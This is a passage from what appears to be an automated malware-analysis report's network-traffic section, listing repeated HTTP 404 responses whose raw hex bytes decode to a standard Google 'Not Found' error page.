70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:17:05 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:17:06 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:17:08 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:17:09 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:17:10 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:17:12 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 